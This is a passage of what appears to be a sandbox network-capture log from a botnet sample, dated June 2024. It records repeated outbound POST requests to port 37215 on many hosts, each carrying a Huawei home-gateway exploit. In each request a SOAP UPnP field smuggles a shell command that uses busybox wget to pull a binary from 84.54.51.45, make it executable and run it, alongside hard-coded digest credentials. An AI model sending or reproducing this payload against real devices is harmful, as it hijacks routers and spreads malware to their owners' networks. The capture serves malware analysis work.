2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2340192.168.2.154484841.57.209.6837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806677103 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2341192.168.2.153397841.60.60.19237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806731939 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2342192.168.2.153680641.172.247.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806754112 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2343192.168.2.154011241.213.130.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806781054 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2344192.168.2.154250641.117.227.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806840897 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2345192.168.2.153439841.90.8.5937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806864023 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2346192.168.2.155496441.171.228.22937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806890011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2347192.168.2.153327241.163.192.12737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806932926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2348192.168.2.153771441.131.90.1837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806940079 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2349192.168.2.153902841.211.120.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.806973934 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2350192.168.2.155231641.73.193.15437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.807004929 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
